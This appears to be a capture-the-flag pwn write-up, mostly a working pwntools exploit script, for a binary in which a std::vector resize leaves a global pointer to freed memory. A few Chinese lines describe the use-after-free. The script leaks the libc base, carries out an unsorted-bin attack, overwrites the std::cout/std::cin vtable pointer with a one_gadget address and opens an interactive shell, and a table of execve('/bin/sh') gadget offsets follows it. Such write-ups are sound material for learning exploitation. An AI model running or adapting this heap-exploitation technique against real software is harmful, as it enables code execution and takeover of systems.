vector的扩容特性:容量按1,2,4,8,16......个元素增长,每次超过阈值,就会将之前的堆块释放,并重新申请大堆块。对应的chunk大小为0x20,0x20,0x50,0x90......
vector的内存分布为
first | cur | last
这题漏洞在于show函数push 0xaabbccdd之后如果vector进行了扩容,就会将之前的chunk释放,但是begin全局变量还是指向原来的堆块,形成UAF漏洞。
利用方式是覆盖在bss段中的std::cout/std::cin的虚表指针为one_gadget
#-*- coding:utf-8 -*-
from PwnContext import *
context.terminal = ['tmux','splitw','-h']


# Thin wrappers around the PwnContext `ctx` object.  Every argument that goes
# on the wire is passed through str() first, exactly as the one-line lambda
# versions did, so callers may hand over ints as well as strings.
def s(data):
    """Send str(data) with no trailing newline."""
    return ctx.send(str(data))


def sa(delim, data):
    """Wait for str(delim) on the stream, then send str(data)."""
    return ctx.sendafter(str(delim), str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return ctx.sendline(str(data))


def sla(delim, data):
    """Wait for str(delim), then send str(data) plus a newline."""
    return ctx.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to *numb* bytes (default 4096)."""
    return ctx.recv(numb)


def ru(delims, drop=True):
    """Receive until *delims*; the delimiter is dropped unless drop=False."""
    return ctx.recvuntil(delims, drop)


def irt():
    """Hand the connection over to the interactive prompt."""
    return ctx.interactive()


def rs(*args, **kwargs):
    """Start the target; all arguments are forwarded to ctx.start()."""
    return ctx.start(*args, **kwargs)


def dbg(gs='', **kwargs):
    """Attach the debugger, passing *gs* as the gdb script."""
    return ctx.debug(gdbscript=gs, **kwargs)


def uu32(data):
    """Unpack a little-endian u32 from *data*, zero-padded on the right to 4 bytes."""
    return u32(data.ljust(4, '\0'))


def uu64(data):
    """Unpack a little-endian u64 from *data*, zero-padded on the right to 8 bytes."""
    return u64(data.ljust(8, '\0'))


def leak_libc(data=0):
    """Read up to the next 0x7f byte (kept), decode its last 6 bytes as a u64 and subtract *data*."""
    leaked = ru('\x7f', drop=False)[-6:]
    return uu64(leaked) - data
# Run-mode switches: debugg selects local (1) vs remote (0) launch,
# logg turns on pwntools debug logging.
debugg = 1
logg = 0

ctx.binary = './pwn1'
ctx.breakpoints=[0x40121E]
ctx.symbols={'lst':0x605380}

if not debugg:
    # Remote mode: set the endpoint first, then start in 'remote' mode.
    ctx.remote = ('0.0.0.0', 23339)
    rs('remote')
else:
    rs()
#ctx.start("gdb",gdbscript="set follow-fork-mode child\nc")

if logg:
    context.log_level='debug'
def lg(s,d):
    """Log ``<s> = <hex(d)>`` via pwntools' success(); *s* is stringified first."""
    line = ' = '.join((str(s), hex(d)))
    success(line)
def cmd(idx):
    """Wait for the menu prompt '>>' and send *idx* as the menu choice."""
    prompt = '>>'
    sla(prompt, idx)
def add(c):
    """Choose menu option 1 and send *c* at the 'num:' prompt."""
    choice = 1
    cmd(choice)
    sla('num:', c)
def free():
    """Choose menu option 3 (the one the script uses to clear the vector)."""
    choice = 3
    cmd(choice)
def show():
    """Choose menu option 2 (the show function described above)."""
    choice = 2
    cmd(choice)
#leak libc_base
# Push 0x10 elements, then call show(); the decimal value printed after '1:'
# is read back and the page-given offset 0x3c4b78 is subtracted to get libc_base.
for i in range(0x10):
    add(i)
show()
ru('1:')
libc_base = int(ru('\n'))-0x3c4b78
lg('libc_base',libc_base)
# show() keeps asking '(y/n):' after each element (NOTE(review): the prompt's exact
# semantics are not visible in this script — presumably "edit this element?"; confirm
# against the binary).  Answer 'n' 34 times, then clear the vector.
for i in range(34):
    sla('(y/n):','n')
free()#clear
# one_gadget address: offset 0x4526a (see the constraint table at the bottom of the file).
one = 0x4526a+libc_base
lg('one',one)
#avoid consolidate: move top_chunk down
for i in range(0x21):
    add(str(one))
free()#clear
#unsortedbin attack
for i in range(0x10):
    add(str(0x21))
show()
# First prompt: 'n'; second prompt: 'y', then send 0x6051E8 as the new value.
# NOTE(review): what 0x6051E8 refers to is not stated in the script; confirm against the binary.
sla('(y/n):','n')
sla('(y/n):','y')
sl(str(0x6051E8))
for i in range(15):
    sla('(y/n):','n')
sla('(y/n):','y')
sl(str(0x41))#change size to avoid unlink
for i in range(16):#rest
    sla('(y/n):','n')
free()#clear
#dbg()
# Push 9 more elements, then drop to the interactive prompt.
for i in range(9):
    add(i)
irt()
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''